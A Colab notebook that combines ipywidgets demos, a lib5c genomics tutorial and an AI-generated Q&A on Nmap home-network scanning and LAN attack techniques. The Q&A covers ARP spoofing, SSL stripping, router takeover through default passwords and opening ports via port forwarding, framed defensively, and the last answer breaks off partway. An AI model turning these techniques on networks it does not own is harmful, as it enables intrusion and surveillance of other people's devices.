<a href="https://colab.research.google.com/github/josephb4224/GoogleColab-Projects/blob/main/Kali-Linux-Tools_Dataset.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# <b><u>Jupyter Widgets</b></u>

[Jupyter Widgets](https://ipywidgets.readthedocs.io/en/latest/examples/Widget%20Basics.html) can be used to add interactivity to notebooks.

In [ ]:
import ipywidgets as widgets

slider = widgets.IntSlider(20, min=0, max=100)
slider

IntSlider(value=20)

In [ ]:
import altair as alt
import ipywidgets as widgets
from vega_datasets import data

source = data.stocks()

stock_picker = widgets.SelectMultiple(
    options=source.symbol.unique(),
    value=list(source.symbol.unique()),
    description='Symbols')

# The value of symbols will come from the stock_picker.
@widgets.interact(symbols=stock_picker)
def render(symbols):
  selected = source[source.symbol.isin(list(symbols))]

  return alt.Chart(selected).mark_line().encode(
      x='date',
      y='price',
      color='symbol',
      strokeDash='symbol',
  )

# To explore the contents of the downloaded dataset, you can list the files:
# !ls -l {path}

interactive(children=(SelectMultiple(description='Symbols', index=(0, 1, 2, 3, 4), options=('MSFT', 'AMZN', 'I…

In [ ]:
# Creating scatter plots using GridspecLayout:
# In these examples, we will demonstrate how to use GridspecLayout
# & bqplot widget to create a multipanel scatter plot. To run this
# example you will need to install bqplot package.
# Use snippet to obtain scatter plot across multiple dimensions
#
# ipywidgets.readthedocs.io/en/latest/examples/Layout Templates.html

import bqplot as bq
import numpy as np
from ipywidgets import GridspecLayout, Button, Layout

n_features = 5
data = np.random.randn(100, n_features)
data[:50, 2] += 4 * data[:50, 0] **2
data[50:, :] += 4

A = np.random.randn(n_features, n_features)/5

data = np.dot(data,A)

scales_x = [bq.LinearScale() for i in range(n_features)]
scales_y = [bq.LinearScale() for i in range(n_features)]

gs = GridspecLayout(n_features, n_features)
for i in range(n_features):
    for j in range(n_features):

        if i != j:
            sc_x = scales_x[j]
            sc_y = scales_y[i]

            scatt = bq.Scatter(x=data[:, j], y=data[:, i], scales={'x': sc_x, 'y': sc_y}, default_size=1)

            gs[i, j] = bq.Figure(marks=[scatt], layout=Layout(width='auto', height='auto'),
                                 fig_margin=dict(top=0, bottom=0, left=0, right=0))
        else:
            sc_x = scales_x[j]
            sc_y = bq.LinearScale()

            hist = bq.Hist(sample=data[:,i], scales={'sample': sc_x, 'count': sc_y})

            gs[i, j] = bq.Figure(marks=[hist], layout=Layout(width='auto', height='auto'),
                                 fig_margin=dict(top=0, bottom=0, left=0, right=0))
gs

GridspecLayout(children=(Figure(fig_margin={'top': 0, 'bottom': 0, 'left': 0, 'right': 0}, layout=Layout(grid_…

In [ ]:
import ipywidgets as widgets
import logging

class OutputWidgetHandler(logging.Handler):
    """ Custom logging handler sending logs to an output widget """

    def __init__(self, *args, **kwargs):
        super(OutputWidgetHandler, self).__init__(*args, **kwargs)
        layout = {
            'width': '100%',
            'height': '160px',
            'border': '1px solid black'
        }
        self.out = widgets.Output(layout=layout)

    def emit(self, record):
        """ Overload of logging.Handler method """
        formatted_record = self.format(record)
        new_output = {
            'name': 'stdout',
            'output_type': 'stream',
            'text': formatted_record+'\n'
        }
        self.out.outputs = (new_output, ) + self.out.outputs

    def show_logs(self):
        """ Show the logs """
        display(self.out)

    def clear_logs(self):
        """ Clear the current logs """
        self.out.clear_output()


logger = logging.getLogger(__name__)
handler = OutputWidgetHandler()
handler.setFormatter(logging.Formatter('%(asctime)s  - [%(levelname)s] %(message)s'))
logger.addHandler(handler)
logger.setLevel(logging.INFO)

# **<u>Open Files From Github</u>**

To open a file from GitHub, you can clone the repo or fetch the file directly.

If you are trying to access files from a private repo, you must use a GitHub access token.

In [ ]:
# Clone the entire repo.
!git clone -l -s git://github.com/jakevdp/PythonDataScienceHandbook.git cloned-repo
%cd cloned-repo
!ls

In [ ]:
# Fetch a single <1MB file using the raw GitHub URL.
!curl --remote-name \
     -H 'Accept: application/vnd.github.v3.raw' \
     --location https://api.github.com/repos/jakevdp/PythonDataScienceHandbook/contents/notebooks/data/california_cities.csv



---

<u>**Scripting tutorial**</u>
==================

This tutorial will walk you through how you might leverage the functions exposed in `lib5c` to write your own analysis scripts.

Follow along in Google colab
-----------------

You can run and modify the cells in this notebook tutorial live using Google colaboratory by clicking the link below:

[![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/thomasgilgenast/lib5c-tutorials/blob/master/scripting_tutorial.ipynb)

To simply have all the cells run automatically, click `Runtime > Run all` in the colab toolbar.

Make sure `lib5c` is installed
------------------------------

Inside a fresh virtual environment, run

In [ ]:
!pip install -q lib5c
!lib5c -v

Make a directory and get data
-----------------------------

If you haven't completed the [pipeline tutorial](pipeline_tutorial.ipynb) yet,
make a directory for the tutorial:

```
$ mkdir lib5c-tutorial
$ cd lib5c-tutorial
```

and prepare the example data in `lib5c-tutorial/input` as shown in the
[pipeline tutorial](pipeline_tutorial.ipynb).

In [ ]:
!python -m lib5c.util.demo_data

Note for Docker image users
---------------------------

If you are using `lib5c` from the Docker image, run

    $ docker run -it -v <full path to lib5c-tutorial>:/lib5c-tutorial creminslab/lib5c:latest
    root@<container_id>:/# cd /lib5c-tutorial

and continue running all tutorial commands in this shell.

Start an interactive session
----------------------------

To quickly get used to calling the functions in `lib5c`, we recommend trying
out the following code snippets in a Python interactive session, which we can
start by running

    $ python

from inside the `lib5c-tutorial` directory.

If you're following along in the IPython notebook, you're already in a Python interactive session and don't need to do anything.

Of course, you're welcome to write scripts and execute them with commands like

    $ python myscript.py

Basic parsing and writing
-------------------------

Normalization
-------------

For our first script, we will apply the Knight-Ruiz algorithm to some of our
data.

First, we need to load information about the primers used in the 5C experiment.
We need to do this before we parse the fragment-level raw countsfiles to make
sure we parse them correctly.

In [ ]:
from lib5c.parsers.primers import load_primermap
primermap = load_primermap('input/BED_ES-NPC-iPS-LOCI_mm9.bed')

Now we can parse a countsfile into a counts dict.

In [ ]:
from lib5c.parsers.counts import load_counts
counts = load_counts('input/pNPC_Rep2.counts', primermap)

Notice that we had to pass the `primermap` as an argument to
[lib5c.parsers.counts.load_counts()](https://lib5c.readthedocs.io/en/latest/lib5c.parsers.counts/#lib5c.parsers.counts.load_counts).

Before balancing the counts matrices, we should remove some low-quality primers
which may impair the matrix balancing process. We actually want to do this on
the basis of primer quality across all the replicates. To do this, we can
leverage the exposed functions [lib5c.algorithms.trimming.trim_primers()](https://lib5c.readthedocs.io/en/latest/lib5c.algorithms.trimming/#lib5c.algorithms.trimming.trim_primers)
and [lib5c.algorithms.trimming.trim_counts()](https://lib5c.readthedocs.io/en/latest/lib5c.algorithms.trimming/#lib5c.algorithms.trimming.trim_counts) to do

In [ ]:
from lib5c.algorithms.trimming import trim_primers, trim_counts
reps = ['v65_Rep1', 'v65_Rep2', 'pNPC_Rep1', 'pNPC_Rep2']
counts_superdict = {rep: load_counts('input/%s.counts' % rep, primermap)
                    for rep in reps}
trimmed_primermap, trimmed_indices = trim_primers(primermap, counts_superdict)
trimmed_counts = trim_counts(counts, trimmed_indices)

For more details, consult the section on [Trimming](https://lib5c.readthedocs.io/en/latest/trimming/).

Now we can balance the counts matrices. To do this, we will use the function
[lib5c.algorithms.knight_ruiz.kr_balance_matrix()](https://lib5c.readthedocs.io/en/latest/lib5c.algorithms.knight_ruiz/#lib5c.algorithms.knight_ruiz.kr_balance_matrix). Most algorithms in
`lib5c` live in the [lib5c.algorithms](https://lib5c.readthedocs.io/en/latest/lib5c.algorithms/) subpackage and expose some sort
of convenience function. To learn more about the various convenience functions
and APIs exposed in `lib5c`, consult the section on
[API specification and conceptual documentation](https://lib5c.readthedocs.io/en/latest/conceptual/)

Go ahead and import this function with

In [ ]:
from lib5c.algorithms.knight_ruiz import kr_balance_matrix

To balance the matrix for the Sox2 region, we can try

In [ ]:
kr_counts_Sox2, bias_Sox2, _ = kr_balance_matrix(trimmed_counts['Sox2'])

To check how balanced the result is, we can immediately check

In [ ]:
import numpy as np
row_sums = np.nansum(kr_counts_Sox2, axis=0)
row_sums[:10]

In [ ]:
np.max(np.abs(np.mean(row_sums) - row_sums))

For more details on matrix balancing, consult the section on
[Bias mitigation](https://lib5c.readthedocs.io/en/latest/bias_mitigation/).

In [ ]:
kr_counts, bias_vectors, _ = kr_balance_matrix(trimmed_counts)

to balance all the matrices in the counts dict. To check how balanced one of the
matrices is, we can check

In [ ]:
row_sums = np.nansum(kr_counts['Klf4'], axis=0)
row_sums[:10]

In [ ]:
np.max(np.abs(np.mean(row_sums) - row_sums))

Notice that the returned object `kr_counts` is a dict indexed by region name,
just like the input argument `counts`.

Finally, we can save the results of our processing with something like

In [ ]:
from lib5c.writers.counts import write_counts
write_counts(kr_counts, 'scripting/pNPC_Rep2_kr.counts', trimmed_primermap)

We should save our trimmed primer set as well so that we don't have to redo the
trimming step every time we load this data.

In [ ]:
from lib5c.writers.primers import write_primermap
write_primermap(trimmed_primermap, 'scripting/primers_trimmed.bed')

Binning
-------

If you closed out of the previous session, you'll need to read back in the data
we were working with. Try

In [ ]:
from lib5c.parsers.primers import load_primermap
trimmed_primermap = load_primermap('scripting/primers_trimmed.bed')
from lib5c.parsers.counts import load_counts
kr_counts = load_counts('scripting/pNPC_Rep2_kr.counts', primermap)

Ultimately, we will want to use the exposed convenience function
[lib5c.algorithms.filtering.fragment_bin_filtering.fragment_bin_filter()](https://lib5c.readthedocs.io/en/latest/lib5c.algorithms.filtering.fragment_bin_filtering/#lib5c.algorithms.filtering.fragment_bin_filtering.fragment_bin_filter).
According to the docstring, it looks like we will need a `pixelmap` and a
`filter_function` in addition to our `counts` dict.

The `pixelmap` represents where our bins should be. To generate one, we will
use the exposed convenience function
[lib5c.algorithms.determine_bins.determine_regional_bins()](https://lib5c.readthedocs.io/en/latest/lib5c.algorithms.determine_bins/#lib5c.algorithms.determine_bins.determine_regional_bins), which can be
used to do generate 8 kb bins covering all the regions in our `trimmed_primermap` as follows:

In [ ]:
from lib5c.algorithms.determine_bins import determine_regional_bins
pixelmap = determine_regional_bins(
    trimmed_primermap, 8000, region_name={r: r for r in primermap.keys()})

The `filter_function` represents the filtering function to be passed over the
counts matrices in order to determine the value in each bin. To construct one,
we can use the exposed convenience function
[lib5c.algorithms.filtering.filter_functions.make_filter_function()](https://lib5c.readthedocs.io/en/latest/lib5c.algorithms.filtering.filter_functions/#lib5c.algorithms.filtering.filter_functions.make_filter_function), which
can be used to do something like

In [ ]:
from lib5c.algorithms.filtering.filter_functions import make_filter_function
filter_function = make_filter_function()

Finally, we can bin our counts with a 20 kb window radius by trying

In [ ]:
from lib5c.algorithms.filtering.fragment_bin_filtering import \
    fragment_bin_filter
binned_counts = fragment_bin_filter(kr_counts, filter_function, pixelmap,
                                    trimmed_primermap, 20000)

To save these counts to disk, we can run

In [ ]:
from lib5c.writers.counts import write_counts
write_counts(binned_counts, 'scripting/pNPC_Rep2_binned.counts', pixelmap)

We can also write the pixelmap we created to the disk as a bin bedfile by trying

In [ ]:
from lib5c.writers.primers import write_primermap
write_primermap(pixelmap, 'scripting/8kb_bins.bed')

For more information about the filtering/binning/smoothing API, see the section
on [Binning and smoothing](https://lib5c.readthedocs.io/en/latest/binning_and_smoothing/).

Plotting heatmaps
-----------------

If you closed out of the previous session, you'll need to read back in the data
we were working with. Try

In [ ]:
from lib5c.parsers.primers import load_primermap
pixelmap = load_primermap('scripting/8kb_bins.bed')
from lib5c.parsers.counts import load_counts
binned_counts = load_counts('scripting/pNPC_Rep2_binned.counts', pixelmap)

To visualize our binned matrices, we can use the exposed function
[lib5c.plotters.heatmap.plot_heatmap()](https://lib5c.readthedocs.io/en/latest/lib5c.plotters.heatmap/#lib5c.plotters.heatmap.plot_heatmap).

Before we start, it's a good idea to transform the counts values to a log scale
for easier visualization

In [ ]:
import numpy as np
logged_counts = {region: np.log(binned_counts[region] + 1)
                 for region in binned_counts.keys()}

First, we need to import the plotting function with

In [ ]:
from lib5c.plotters.heatmap import plot_heatmap

We can draw the heatmap for just one region with

In [ ]:
%%capture
%matplotlib inline
plot_heatmap(logged_counts['Sox2'], grange_x=pixelmap['Sox2'], rulers=True,
             genes='mm9', colorscale=(1.0, 4.5), colorbar=True,
             outfile='scripting/pNPC_Rep2_binned_Sox2.png');

The resulting image should look something like this:

In [ ]:
from IPython.display import Image
Image(filename='scripting/pNPC_Rep2_binned_Sox2.png', width=500)

Because [plot_heatmap()](https://lib5c.readthedocs.io/en/latest/lib5c.plotters.heatmap/#lib5c.plotters.heatmap.plot_heatmap) is parallelized with the `@parallelize_regions`
decorator, we can draw the heatmaps for all regions at once by simply calling

In [ ]:
%%capture
%matplotlib inline
outfile_names = {region: 'scripting/pNPC_Rep2_binned_%s.png' % region
                 for region in binned_counts.keys()}
plot_heatmap(logged_counts, grange_x=pixelmap, rulers=True, genes='mm9',
             colorscale=(1.0, 4.5), colorbar=True, outfile=outfile_names);

where we precompute a dict of output filenames (parallel to `counts_binned`)
to describe where each region's heatmap will get drawn (since each region will
be drawn to a separate heatmap). In this way, any argument to a parallelized
function can be replaced by a dict whose keys match the keys of the first
positional argument (which is usually a counts dict).

You can show the plot directly inline in a notebook environment by skipping the `outfile` kwarg:

In [ ]:
%matplotlib inline
plot_heatmap(logged_counts['Sox2'], grange_x=pixelmap['Sox2'], rulers=True,
             genes='mm9', colorscale=(1.0, 4.5), colorbar=True);

Expected modeling
-----------------

The exposed convenience function for making an expected model is
[lib5c.algorithms.expected.make_expected_matrix()](https://lib5c.readthedocs.io/en/latest/lib5c.algorithms.expected/#lib5c.algorithms.expected.make_expected_matrix).

To construct an expected model for each region using a simple power law
relationship and apply donut correction in the same step, we can try

In [ ]:
from lib5c.algorithms.expected import make_expected_matrix
exp_counts, dist_exp, _ = make_expected_matrix(
    binned_counts, regression=True, exclude_near_diagonal=True, donut=True)

The first returned value, `counts_exp`, is simply a dict of the expected
matrices representing the model. The second returned value, `dist_exp`, is a
representation of the simple one-dimensional expected model.

We can visualize the one-dimensional expected model using
[lib5c.plotters.expected.plot_bin_expected()](https://lib5c.readthedocs.io/en/latest/lib5c.plotters.expected/#lib5c.plotters.expected.plot_bin_expected).

In [ ]:
%%capture
%matplotlib inline
from lib5c.plotters.expected import plot_bin_expected
plot_bin_expected(binned_counts['Sox2'], dist_exp['Sox2'],
                  outfile='scripting/pNPC_Rep2_expected_model_Sox2.png',
                  hexbin=True, semilog=True, xlabel='distance');

or for all regions at once,

In [ ]:
%%capture
%matplotlib inline
from lib5c.plotters.expected import plot_bin_expected
outfile_names = {region: 'scripting/pNPC_Rep2_expected_model_%s.png' % region
                 for region in binned_counts.keys()}
plot_bin_expected(binned_counts, dist_exp, outfile=outfile_names, hexbin=True,
                  semilog=True, xlabel='distance');

The kwargs `hexbin`, `semilog`, and `ylabel` tweak the visual appearance
of the resulting plot.

The resulting images should look something like this:

In [ ]:
Image(filename='scripting/pNPC_Rep2_expected_model_Sox2.png', width=500)

To learn more, consult the section on [Expected modeling](https://lib5c.readthedocs.io/en/latest/expected_modeling/).

Variance modeling
-----------------

The exposed convenience functions for variance modeling is
[lib5c.algorithms.variance.estimate_variance()](https://lib5c.readthedocs.io/en/latest/lib5c.algorithms.variance.estimate_variance/#lib5c.algorithms.variance.estimate_variance).

We can get variance estimates from a log-normal, deviation-based distance-variance relationship model by trying

In [ ]:
from lib5c.algorithms.variance import estimate_variance
var_counts = estimate_variance(binned_counts, exp_counts)

To learn more, consult the section on [Variance modeling](https://lib5c.readthedocs.io/en/latest/variance_modeling/).

P-value calling
---------------

The exposed convenience function for calling p-values using distributions
parametrized according to the expected and variance models is
[lib5c.util.distributions.call_pvalues()](https://lib5c.readthedocs.io/en/latest/lib5c.util.distributions/#lib5c.util.distributions.call_pvalues).

To simply call the p-values using a log-normal distribution, we can try

In [ ]:
from lib5c.util.distributions import call_pvalues
from lib5c.util.counts import parallel_log_counts
pvalues = call_pvalues(parallel_log_counts(binned_counts), exp_counts,
                       var_counts, 'norm', log=True)

Where we are logging the observed counts and comparing them to a normal distribution.

We can visualize these called p-values as interaction scores
(`-10*log2(pvalue)`) on heatmaps by calling

In [ ]:
%%capture
%matplotlib inline
from lib5c.plotters.heatmap import plot_heatmap
from lib5c.util.counts import convert_pvalues_to_interaction_scores
outfile_names = {region: 'scripting/pNPC_Rep2_is_%s.png' % region
                 for region in pvalues.keys()}
interaction_scores = convert_pvalues_to_interaction_scores(pvalues)
plot_heatmap(interaction_scores, grange_x=pixelmap, rulers=True, #genes='mm9',
             colorscale=(0, 300), colorbar=True, colormap='is',
             outfile=outfile_names);

and write the called p-values to the disk as counts files by calling

In [ ]:
from lib5c.writers.counts import write_counts
write_counts(pvalues, 'scripting/pNPC_Rep2_pvalues.counts', pixelmap)

The resulting heatmaps should look something like this

In [ ]:
Image(filename='scripting/pNPC_Rep2_is_Sox2.png', width=500)

For more information on the distribution fitting and p-value calling API, see
the section on [Distributions](https://lib5c.readthedocs.io/en/latest/distributions/).

Next steps
----------

This tutorial shows only a few of the functions exposed in the `lib5c` API.
You can read more about what you can do with `lib5c` in the section on
[API specification and conceptual documentation](https://lib5c.readthedocs.io/en/latest/conceptual/).



---

# **<u>GOOGLE COLAB AI — HACKER Q&A's</u>**

In [ ]:
# Only text-to-text input/output is supported
from google.colab import ai

response = ai.generate_text("What is a step-by-step walkthrough of using Nmap to scan a local Network to check which devices are connected to my router and what would a 'hacker' be able to do if connected to my local network?")
print(response)

This is an excellent question that covers both practical network introspection and critical security awareness. Let's break it down step by step.

---

## Part 1: Step-by-Step Walkthrough Using Nmap to Scan Your Local Network

**Disclaimer:** You *must only* perform Nmap scans on networks you own or have explicit permission to scan. Scanning external networks or networks you don't have authority over is illegal and unethical. For this walkthrough, we are strictly focusing on *your own local home network*.

Nmap (Network Mapper) is a powerful, open-source tool for network discovery and security auditing. It can discover hosts and services on a computer network by sending packets and analyzing the responses.

### 1. Install Nmap

**a. Linux (Ubuntu/Debian-based):**
Open your terminal and type:
```bash
sudo apt update
sudo apt install nmap
```

**b. Linux (Fedora/RHEL-based):**
Open your terminal and type:
```bash
sudo dnf install nmap
```

**c. macOS:**
The easiest way is to use Homebrew (if you don't have it, install it from `brew.sh`):
```bash
brew install nmap
```
Alternatively, you can download the `.dmg` installer from the official Nmap website: `nmap.org/download.html`

**d. Windows:**
Go to the official Nmap website: `nmap.org/download.html` and download the latest stable release executable installer (e.g., `nmap-*-setup.exe`). Follow the installation wizard. It often includes Zenmap, a graphical front-end for Nmap, which can be easier for beginners. For this guide, we'll focus on the command-line interface as it's more common and flexible.

### 2. Identify Your Local Network Range

Nmap needs to know *what* to scan. You'll need your computer's IP address and subnet mask to determine your local network range.

**a. Windows:**
Open Command Prompt (`cmd.exe`) or PowerShell and type:
```bash
ipconfig
```
Look for your active network adapter (e.g., "Ethernet adapter Ethernet" or "Wireless LAN adapter Wi-Fi"). You'll see:
*   **IPv4 Address:** e.g., `192.168.1.100`
*   **Subnet Mask:** e.g., `255.255.255.0`
*   **Default Gateway:** e.g., `192.168.1.1` (This is usually your router's IP address)

**b. macOS/Linux:**
Open Terminal and type:
```bash
ip a
```
or (older command, still works on many systems)
```bash
ifconfig
```
Look for your active network interface (e.g., `eth0`, `wlan0`, `en0`). You'll see an IP address often followed by a `/` and a number (e.g., `192.168.1.100/24`). This `/24` is CIDR notation for `255.255.255.0`.

**Understanding Your Network Range (CIDR Notation):**
*   If your IP is `192.168.1.100` and your Subnet Mask is `255.255.255.0`, your network range is `192.168.1.0/24`. This means all IP addresses from `192.168.1.1` to `192.168.1.254` could potentially be active.
*   If your IP is `192.168.0.50` and Subnet Mask is `255.255.255.0`, your range is `192.168.0.0/24`.
*   If your IP is `10.0.0.10` and Subnet Mask is `255.255.255.0`, your range is `10.0.0.0/24`.

For most home networks, it will be `192.168.1.0/24`, `192.168.0.0/24`, or `10.0.0.0/24`.

### 3. Perform a Basic Host Discovery Scan

This scan specifically looks for active devices (hosts) on your network without performing extensive port scanning, making it quicker for just finding who's home.

Open your terminal or command prompt and run one of the following commands (replace `[Your_Network_Range]` with what you found in step 2, e.g., `192.168.1.0/24`):

**a. Recommended: Ping Scan (-sn or -sP)**
This is often the fastest way to see what's alive.
```bash
nmap -sn [Your_Network_Range]
```
*(On Linux/macOS, you might need `sudo` for Nmap to perform certain functions like MAC address resolution accurately for all hosts. `sudo nmap -sn [Your_Network_Range]`)*

**Explanation of `-sn` (or `-sP`):**
*   `-sn` (or `--host-discovery`): This option tells Nmap to *only* perform host discovery (ping scan) and not port scan. It sends ICMP echo requests (pings), TCP SYN packets to port 443, and TCP ACK packets to port 80 to determine if a host is up.
*   The output will show you each host that Nmap believes is online.

**Example Output:**
```
Starting Nmap 7.92 ( https://nmap.org ) at 2023-10-27 10:30 EDT
Nmap scan report for _gateway (192.168.1.1)
Host is up (0.00072s latency).
MAC Address: 00:1A:2B:3C:4D:5E (Router Vendor)
Nmap scan report for MyPC (192.168.1.100)
Host is up (0.000045s latency).
MAC Address: AB:CD:EF:01:23:45 (PC Vendor)
Nmap scan report for SmartTV (192.168.1.101)
Host is up (0.00054s latency).
MAC Address: 67:89:AB:CD:EF:01 (TV Vendor)
Nmap scan report for unknown (192.168.1.102)
Host is up (0.00002s latency).
MAC Address: 0A:1B:2C:3D:4E:5F (Unknown Vendor)
Nmap scan report for MyPhone (192.168.1.103)
Host is up (0.00008s latency).
MAC Address: FF:EE:DD:CC:BB:AA (Phone Vendor)
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.34 seconds
```

### 4. Interpret the Results

*   **`Host is up`**: This indicates that Nmap detected a device responding on that IP address.
*   **IP Address**: The unique identifier for the device on your network.
*   **Hostname**: If your network (or the device itself) has configured a hostname, Nmap might resolve it (e.g., `MyPC`, `SmartTV`).
*   **MAC Address**: The Media Access Control address is a unique hardware identifier for the network interface card (NIC) of the device. This is extremely useful for identifying unknown devices.
*   **Vendor**: Nmap often tries to look up the MAC address in its database to tell you the manufacturer of the device. This helps identify "unknown" devices (e.g., a device with a MAC address starting with `00:0C:C7` is likely a Ubiquiti device).

**What to look for:**
*   Your router (usually the `.1` address in the range).
*   Your computer(s).
*   Your phone(s).
*   Smart TVs, gaming consoles, smart speakers, security cameras, printers, NAS drives, IoT devices.
*   **Anything you don't recognize**: This is where you might need to investigate. An unknown MAC address might be a guest's device you forgot about, or it could potentially be an unauthorized device.

### 5. (Optional) More Detailed Scans for Identification

If you find an unknown device, you might want to run a more detailed scan on just that specific IP address to learn more.

*   **Scan for open ports and services:**
    ```bash
    nmap -sV [IP_of_unknown_device]
    ```
    *   `-sV`: Service/Version detection. This tries to determine what services are running on open ports (e.g., web server, SSH, FTP) and their versions. This can give you clues about the device's function.

*   **OS Detection and other features (Aggressive Scan):**
    ```bash
    nmap -A [IP_of_unknown_device]
    ```
    *   `-A`: Aggressive scan. Enables OS detection (`-O`), version detection (`-sV`), script scanning (`-sC`), and traceroute. This can be noisy but provides a lot of information.

---

## Part 2: What a 'Hacker' Could Do if Connected to My Local Network

If an unauthorized person ("hacker") gains access to your local network (e.g., by cracking your Wi-Fi password, physically plugging into your router, or a compromised device on your network), they have a significant advantage and can perform a wide range of malicious activities. Here's a breakdown:

### 1. Extensive Information Gathering & Reconnaissance

*   **Network Mapping:** They'd use tools like Nmap (as you just did) to map out all connected devices, their IP addresses, open ports, running services, operating systems, and even specific software versions.
*   **Device Identification:** They'd identify critical devices like NAS (Network Attached Storage), smart home hubs, security cameras, printers, other computers, and IoT devices.
*   **Traffic Analysis:** With tools like Wireshark, they can monitor all unencrypted traffic flowing through the network. This can reveal:
    *   Websites visited (even if HTTPS, they see the domain).
    *   DNS queries (what hosts are being looked up).
    *   Unencrypted usernames and passwords (e.g., for old FTP, Telnet, or HTTP services).
    *   Contents of unencrypted emails, chats, or file transfers.

### 2. Traffic Interception & Manipulation (Man-in-the-Middle)

*   **ARP Spoofing/Poisoning:** They can trick devices on the network into sending their traffic *through* the hacker's device instead of directly to the router. This allows the hacker to:
    *   **Sniff all traffic:** Even encrypted traffic (though the content remains encrypted unless further attacks are used).
    *   **SSL Stripping:** Downgrade HTTPS connections to HTTP, allowing them to see login credentials and other sensitive data in plain text.
    *   **DNS Spoofing:** Redirect you to fake websites when you type a legitimate URL (e.g., redirecting `yourbank.com` to a phishing site they control).

### 3. Exploiting Vulnerabilities

*   **Unpatched Software/OS:** They'll look for devices with outdated operating systems or applications that have known security flaws.
*   **Weak Passwords:** Many IoT devices, network printers, and even routers ship with default or easily guessable passwords. The hacker can try these to gain administrative access.
*   **Vulnerable Services:** They can exploit misconfigured or vulnerable services running on devices (e.g., old SMB shares, insecure RDP/SSH, web server vulnerabilities on NAS devices or smart hubs).
*   **Router Compromise:** If they can access your router's admin interface (via weak password or firmware vulnerability), they can:
    *   Change DNS settings to point to malicious servers.
    *   Open ports for external access to your internal network.
    *   Monitor all internet traffic.
    *   Install malicious firmware.

### 4. Direct Access and Control

*   **File Access:** Gain access to shared folders, network drives (NAS), and potentially sensitive documents, photos, or backups.
*   **Remote Access:** Connect to other computers or servers on the network using protocols like RDP (Remote Desktop Protocol) or SSH if they find valid credentials or exploit vulnerabilities.
*   **Webcam/Microphone Access:** If they compromise a computer or smart device, they could potentially activate its webcam or microphone for surveillance.
*   **Smart Home Control:** Manipulate smart lights, locks, thermostats, or security systems.

### 5. Malware Distribution & Persistence

*   **Ransomware/Worms:** Easily spread malware like ransomware from one compromised device to others on the network, encrypting files and demanding payment.
*   **Keyloggers/Spyware:** Install software on compromised machines to record keystrokes, capture screenshots, or steal credentials.
*   **Backdoors:** Establish persistent access to your network, even if you change passwords, by installing backdoors or creating new unauthorized user accounts.
*   **Botnet Recruitment:** Enroll your devices into a botnet, using your bandwidth and computing power for their malicious activities (e.g., DDoS attacks).

### 6. Lateral Movement & Escalation

*   Once one device is compromised, it can be used as a pivot point to launch further attacks on other, potentially more secure, devices on the network.
*   They can try to steal credentials from one device to gain access to another, ultimately aiming for the most valuable data or systems.

---

### How to Protect Yourself:

*   **Strong, Unique Wi-Fi Password:** Use WPA2/WPA3 encryption with a long, complex passphrase. Change it regularly.
*   **Router Security:**
    *   Change the default administrator username and password.
    *   Keep your router firmware updated.
    *   Disable WPS (Wi-Fi Protected Setup).
    *   Disable remote management.
    *   Consider enabling a guest network for visitors to isolate their devices from your main network.
*   **Firewalls:** Ensure your operating system's firewall is enabled and configured correctly. Your router also has a firewall – make sure it's active.
*   **Software Updates:** Keep all your operating systems, applications, and IoT devices updated to patch known vulnerabilities.
*   **Strong Passwords:** Use strong, unique passwords for all devices and services, especially those exposed on the network (NAS, smart home hubs, cameras). Use a password manager.
*   **Disable Unnecessary Services:** If a device has services you don't use (e.g., FTP server on a NAS), disable them. Fewer open ports mean less attack surface.
*   **HTTPS Everywhere:** Always prefer websites and services that use HTTPS/SSL for encrypted communication.
*   **VPN:** Use a VPN, especially on public Wi-Fi, but it can also add an extra layer of encryption for internet traffic even on your home network.
*   **Antivirus/Anti-malware:** Keep these updated and perform regular scans.
*   **Network Monitoring:** Periodically run Nmap scans (like you just learned) to see if any unknown devices appear on your network.
*   **Physical Security:** Secure your physical router, especially if you have sensitive internal systems.

By understanding these threats and taking appropriate security measures, you can significantly reduce the risk of a hacker compromising your local network.

In [ ]:
# Only text-to-text input/output is supported
from google.colab import ai

response = ai.generate_text("How do they set up 'Open ports for external access to your internal network', or 'Monitor all internet traffic' just by being connected to my Router? What tools or commands do they use to do such hacks, and how does it all work? How can they establish persistent access to my network by installing backdoors or creating new unauthorized user accounts? Can they do it from their device as long as they are on the same network as I am, or do they need full access to the router directly? If two devices are connected to the same network, do they have access to each other automatically?Lastly, I still barely understand how Ports work, and the difference between a 'localhost', and something like 'Port Forwarding', i.e., when only local devices can see it with a scan, compared to the entire world can scan it? Can you explain this to me?")
print(response)

This is a fantastic set of questions that delves into the core of network security and how local networks interact with the internet. Let's break it down.

First, a crucial distinction: "being connected to my Router" can mean two very different things:
1.  **Being connected to the *network* your router creates (via Wi-Fi or Ethernet cable).** This means you're an *internal* device.
2.  **Having *administrative access* to the router itself (e.g., knowing the admin username/password).** This gives full control over the router's settings.

The capabilities of an attacker differ greatly depending on which level of access they have.

---

### How Hackers Set Up 'Open Ports' or 'Monitor Traffic'

**Scenario 1: Attacker has *Administrative Access* to Your Router**
This is the most direct and dangerous scenario. If an attacker gains full administrative access to your router, they effectively control your network's gateway to the internet.

*   **How they get Admin Access:**
    *   **Default Credentials:** Many routers come with default usernames (e.g., `admin`) and passwords (e.g., `admin`, `password`, `1234`). If you haven't changed them, an attacker can simply look them up online.
    *   **Weak Passwords:** Easily guessable or cracked passwords.
    *   **Vulnerabilities in Router Firmware:** Flaws in the router's software can allow remote code execution or privilege escalation, even without knowing the password. These are often targeted by state-sponsored actors or advanced persistent threats (APTs).
    *   **Social Engineering/Phishing:** Tricking you into revealing your router password.
    *   **Malware on your Computer:** If your computer is compromised, malware can sometimes extract stored router credentials or exploit local network vulnerabilities to gain router access.

*   **How they 'Open Ports for External Access':**
    If they have admin access, they can simply log into the router's web interface (or use SSH/Telnet if enabled) and configure:
    *   **Port Forwarding:** They can forward a port from your public IP address directly to an internal device's IP address and port number. For example, they could forward port 8080 from your public IP to a compromised server (or even your PC) on your internal network at 192.168.1.100:80.
    *   **DMZ (Demilitarized Zone):** They can put an entire internal device (like a compromised server or PC) into the DMZ. This means *all* incoming traffic from the internet that isn't specifically forwarded elsewhere will go directly to that device, bypassing the router's firewall entirely. This is extremely dangerous.
    *   **Remote Management:** They might enable remote management on the router itself, allowing them to access the router's admin interface from outside your network.
    *   **VPN Server:** Some routers have built-in VPN servers. An attacker could configure one, creating a secure tunnel back to your network from anywhere in the world.

*   **How they 'Monitor All Internet Traffic':**
    With full router access, they can potentially:
